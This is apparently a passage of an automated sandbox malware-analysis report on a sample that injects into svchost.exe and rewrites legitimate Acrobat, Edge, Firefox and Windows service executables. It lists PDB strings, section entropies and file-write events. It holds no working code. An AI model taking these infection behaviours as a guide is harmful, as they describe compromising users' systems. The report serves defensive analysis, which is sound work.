              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: svchost.exe, 00000006.00000003.2438532554.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: svchost.exe, 00000006.00000003.1919148439.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: svchost.exe, 00000006.00000003.2482581363.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2496506784.0000000004B80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: name.exe, 00000001.00000003.1802681812.0000000005030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000001.00000003.1802504246.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1821978946.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1818359606.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1837727518.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1840416756.0000000005860000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: svchost.exe, 00000006.00000003.2032642838.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: svchost.exe, 00000006.00000003.2032642838.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdb source: svchost.exe, 00000006.00000003.2075539957.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: svchost.exe, 00000006.00000003.2393262607.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntkrnlmp.pdbce_T151c2VyQ29udGV4dElkPTUsYSw=p source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ALG.pdb source: svchost.exe, 00000006.00000003.1854023776.0000000005890000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdb source: svchost.exe, 00000006.00000003.1931405560.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: svchost.exe, 00000006.00000003.1876194254.00000000056D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdbGCTL source: svchost.exe, 00000006.00000003.1854023776.0000000005890000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: svchost.exe, 00000006.00000003.1892510705.0000000005750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3178209395.0000000001470000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: svchost.exe, 00000006.00000003.1987958380.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1978746407.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: svchost.exe, 00000006.00000003.2193636183.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdbX source: svchost.exe, 00000006.00000003.2024944125.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: svchost.exe, 00000006.00000003.2602531162.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdb source: svchost.exe, 00000006.00000003.2004063369.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: svchost.exe, 00000006.00000003.2438532554.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: svchost.exe, 00000006.00000003.2393262607.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: svchost.exe, 00000006.00000003.2602531162.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBIEnloh source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp
              Source: msiexec.exe.6.drStatic PE information: 0x88D88F1C [Thu Oct 2 20:16:28 2042 UTC]
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: name.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x2ffd40
              Source: tyRPPK48Mk.exeStatic PE information: real checksum: 0xa961f should be: 0x2ffd40
              Source: default-browser-agent.exe.6.drStatic PE information: section name: .00cfg
              Source: default-browser-agent.exe.6.drStatic PE information: section name: .voltbl
              Source: firefox.exe.6.drStatic PE information: section name: .00cfg
              Source: firefox.exe.6.drStatic PE information: section name: .freestd
              Source: firefox.exe.6.drStatic PE information: section name: .retplne
              Source: firefox.exe.6.drStatic PE information: section name: .voltbl
              Source: GoogleCrashHandler64.exe.6.drStatic PE information: section name: _RDATA
              Source: GoogleCrashHandler64.exe.6.drStatic PE information: section name: .gxfg
              Source: GoogleCrashHandler64.exe.6.drStatic PE information: section name: .gehcont
              Source: GoogleUpdateComRegisterShell64.exe.6.drStatic PE information: section name: _RDATA
              Source: GoogleUpdateComRegisterShell64.exe.6.drStatic PE information: section name: .gxfg
              Source: GoogleUpdateComRegisterShell64.exe.6.drStatic PE information: section name: .gehcont
              Source: maintenanceservice.exe.6.drStatic PE information: section name: .00cfg
              Source: maintenanceservice.exe.6.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe.6.drStatic PE information: section name: _RDATA
              Source: minidump-analyzer.exe.6.drStatic PE information: section name: .00cfg
              Source: minidump-analyzer.exe.6.drStatic PE information: section name: .voltbl
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: section name: .00cfg
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: section name: .retplne
              Source: pingsender.exe.6.drStatic PE information: section name: .00cfg
              Source: pingsender.exe.6.drStatic PE information: section name: .voltbl
              Source: plugin-container.exe.6.drStatic PE information: section name: .00cfg
              Source: plugin-container.exe.6.drStatic PE information: section name: .voltbl
              Source: private_browsing.exe.6.drStatic PE information: section name: .00cfg
              Source: private_browsing.exe.6.drStatic PE information: section name: .voltbl
              Source: updater.exe.6.drStatic PE information: section name: .00cfg
              Source: updater.exe.6.drStatic PE information: section name: .voltbl
              Source: updater.exe.6.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe.6.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe.6.drStatic PE information: section name: .gxfg
              Source: elevation_service.exe.6.drStatic PE information: section name: .retplne
              Source: elevation_service.exe.6.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe.6.drStatic PE information: section name: malloc_h
              Source: elevation_service.exe0.6.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe0.6.drStatic PE information: section name: .gxfg
              Source: elevation_service.exe0.6.drStatic PE information: section name: .retplne
              Source: elevation_service.exe0.6.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe0.6.drStatic PE information: section name: malloc_h
              Source: maintenanceservice.exe0.6.drStatic PE information: section name: .00cfg
              Source: maintenanceservice.exe0.6.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe0.6.drStatic PE information: section name: _RDATA
              Source: msdtc.exe.6.drStatic PE information: section name: .didat
              Source: msiexec.exe.6.drStatic PE information: section name: .didat
              Source: armsvc.exe.6.drStatic PE information: section name: .didat
              Source: alg.exe.6.drStatic PE information: section name: .didat
              Source: FXSSVC.exe.6.drStatic PE information: section name: .didat
              Source: MsSense.exe.6.drStatic PE information: section name: .didat
              Source: unpack200.exe.6.drStatic PE information: section name: .00cfg
              Source: Spectrum.exe.6.drStatic PE information: section name: .didat
              Source: TieringEngineService.exe.6.drStatic PE information: section name: .didat
              Source: vds.exe.6.drStatic PE information: section name: .didat
              Source: VSSVC.exe.6.drStatic PE information: section name: .didat
              Source: WmiApSrv.exe.6.drStatic PE information: section name: .didat
              Source: wmpnetwk.exe.6.drStatic PE information: section name: .didat
              Source: SearchIndexer.exe.6.drStatic PE information: section name: .didat
              Source: ie_to_edge_stub.exe.6.drStatic PE information: section name: .00cfg
              Source: ie_to_edge_stub.exe.6.drStatic PE information: section name: .gxfg
              Source: ie_to_edge_stub.exe.6.drStatic PE information: section name: .retplne
              Source: ie_to_edge_stub.exe.6.drStatic PE information: section name: _RDATA
              Source: cookie_exporter.exe.6.drStatic PE information: section name: .00cfg
              Source: cookie_exporter.exe.6.drStatic PE information: section name: .gxfg
              Source: cookie_exporter.exe.6.drStatic PE information: section name: .retplne
              Source: cookie_exporter.exe.6.drStatic PE information: section name: _RDATA
              Source: identity_helper.exe.6.drStatic PE information: section name: .00cfg
              Source: identity_helper.exe.6.drStatic PE information: section name: .gxfg
              Source: identity_helper.exe.6.drStatic PE information: section name: .retplne
              Source: identity_helper.exe.6.drStatic PE information: section name: _RDATA
              Source: identity_helper.exe.6.drStatic PE information: section name: malloc_h
              Source: setup.exe.6.drStatic PE information: section name: .00cfg
              Source: setup.exe.6.drStatic PE information: section name: .gxfg
              Source: setup.exe.6.drStatic PE information: section name: .retplne
              Source: setup.exe.6.drStatic PE information: section name: LZMADEC
              Source: setup.exe.6.drStatic PE information: section name: _RDATA
              Source: setup.exe.6.drStatic PE information: section name: malloc_h
              Source: msedgewebview2.exe.6.drStatic PE information: section name: .00cfg
              Source: msedgewebview2.exe.6.drStatic PE information: section name: .gxfg
              Source: msedgewebview2.exe.6.drStatic PE information: section name: .retplne
              Source: msedgewebview2.exe.6.drStatic PE information: section name: CPADinfo
              Source: msedgewebview2.exe.6.drStatic PE information: section name: LZMADEC
              Source: msedgewebview2.exe.6.drStatic PE information: section name: _RDATA
              Source: msedgewebview2.exe.6.drStatic PE information: section name: malloc_h
              Source: msedge_proxy.exe.6.drStatic PE information: section name: .00cfg
              Source: msedge_proxy.exe.6.drStatic PE information: section name: .gxfg
              Source: msedge_proxy.exe.6.drStatic PE information: section name: .retplne
              Source: msedge_proxy.exe.6.drStatic PE information: section name: _RDATA
              Source: msedge_proxy.exe.6.drStatic PE information: section name: malloc_h
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: section name: .00cfg
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: section name: .gxfg
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: section name: .retplne
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: section name: LZMADEC
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: section name: _RDATA
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: section name: malloc_h
              Source: notification_click_helper.exe.6.drStatic PE information: section name: .00cfg
              Source: notification_click_helper.exe.6.drStatic PE information: section name: .gxfg
              Source: notification_click_helper.exe.6.drStatic PE information: section name: .retplne
              Source: notification_click_helper.exe.6.drStatic PE information: section name: CPADinfo
              Source: notification_click_helper.exe.6.drStatic PE information: section name: _RDATA
              Source: notification_click_helper.exe.6.drStatic PE information: section name: malloc_h
              Source: pwahelper.exe.6.drStatic PE information: section name: .00cfg
              Source: pwahelper.exe.6.drStatic PE information: section name: .gxfg
              Source: pwahelper.exe.6.drStatic PE information: section name: .retplne
              Source: pwahelper.exe.6.drStatic PE information: section name: _RDATA
              Source: pwahelper.exe.6.drStatic PE information: section name: malloc_h
              Source: msedge_proxy.exe0.6.drStatic PE information: section name: .00cfg
              Source: msedge_proxy.exe0.6.drStatic PE information: section name: .gxfg
              Source: msedge_proxy.exe0.6.drStatic PE information: section name: .retplne
              Source: msedge_proxy.exe0.6.drStatic PE information: section name: _RDATA
              Source: msedge_proxy.exe0.6.drStatic PE information: section name: malloc_h
              Source: Acrobat.exe.6.drStatic PE information: section name: .didat
              Source: Acrobat.exe.6.drStatic PE information: section name: _RDATA
              Source: AcroCEF.exe.6.drStatic PE information: section name: .didat
              Source: AcroCEF.exe.6.drStatic PE information: section name: _RDATA
              Source: pwahelper.exe0.6.drStatic PE information: section name: .00cfg
              Source: pwahelper.exe0.6.drStatic PE information: section name: .gxfg
              Source: pwahelper.exe0.6.drStatic PE information: section name: .retplne
              Source: pwahelper.exe0.6.drStatic PE information: section name: _RDATA
              Source: pwahelper.exe0.6.drStatic PE information: section name: malloc_h
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00402654 push 8B0000B1h; iretd 0_2_00402659
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00462463 push edi; ret 1_2_00462465
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00416CB5 push ecx; ret 1_2_00416CC8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00462463 push edi; ret 3_2_00462465
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00416CB5 push ecx; ret 3_2_00416CC8
              Source: default-browser-agent.exe.6.drStatic PE information: section name: .reloc entropy: 7.941513660026067
              Source: firefox.exe.6.drStatic PE information: section name: .reloc entropy: 7.93887388458026
              Source: minidump-analyzer.exe.6.drStatic PE information: section name: .reloc entropy: 7.935440513053074
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: section name: .reloc entropy: 7.934736259673055
              Source: elevation_service.exe.6.drStatic PE information: section name: .reloc entropy: 7.943918524487799
              Source: elevation_service.exe0.6.drStatic PE information: section name: .reloc entropy: 7.945924268600776
              Source: Aut2exe.exe.6.drStatic PE information: section name: .rsrc entropy: 7.800626389616807
              Source: AppVClient.exe.6.drStatic PE information: section name: .reloc entropy: 7.93649060877241
              Source: FXSSVC.exe.6.drStatic PE information: section name: .reloc entropy: 7.9422548904612915
              Source: SensorDataService.exe.6.drStatic PE information: section name: .reloc entropy: 7.935355895957106
              Source: Spectrum.exe.6.drStatic PE information: section name: .reloc entropy: 7.945415728324186
              Source: AgentService.exe.6.drStatic PE information: section name: .reloc entropy: 7.937091009432048
              Source: vds.exe.6.drStatic PE information: section name: .reloc entropy: 7.941045748846461
              Source: VSSVC.exe.6.drStatic PE information: section name: .reloc entropy: 7.939508466333068
              Source: wbengine.exe.6.drStatic PE information: section name: .reloc entropy: 7.941253589303184
              Source: wmpnetwk.exe.6.drStatic PE information: section name: .reloc entropy: 7.9465794243283545
              Source: SearchIndexer.exe.6.drStatic PE information: section name: .reloc entropy: 7.945830998623169
              Source: identity_helper.exe.6.drStatic PE information: section name: .reloc entropy: 7.940732812444733
              Source: setup.exe.6.drStatic PE information: section name: .reloc entropy: 7.944723894883075
              Source: msedgewebview2.exe.6.drStatic PE information: section name: .reloc entropy: 7.936556443377246
              Source: msedge_proxy.exe.6.drStatic PE information: section name: .reloc entropy: 7.942258384223362
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: section name: .reloc entropy: 7.9462587980306765
              Source: notification_click_helper.exe.6.drStatic PE information: section name: .reloc entropy: 7.944006817193669
              Source: pwahelper.exe.6.drStatic PE information: section name: .reloc entropy: 7.940882612865116
              Source: msedge_proxy.exe0.6.drStatic PE information: section name: .reloc entropy: 7.942246486712946
              Source: 7zFM.exe.6.drStatic PE information: section name: .reloc entropy: 7.932115674220289
              Source: 7zG.exe.6.drStatic PE information: section name: .reloc entropy: 7.927661955452567
              Source: Acrobat.exe.6.drStatic PE information: section name: .reloc entropy: 7.940509411781235
              Source: AcroCEF.exe.6.drStatic PE information: section name: .reloc entropy: 7.9375397048497005
              Source: pwahelper.exe0.6.drStatic PE information: section name: .reloc entropy: 7.940887545213508

              Persistence and Installation Behavior

              barindex
              Creates files in the system32 config directory
              Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\73722fd785394ff7.binJump to behavior
              Drops executable to a common third party application directory
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
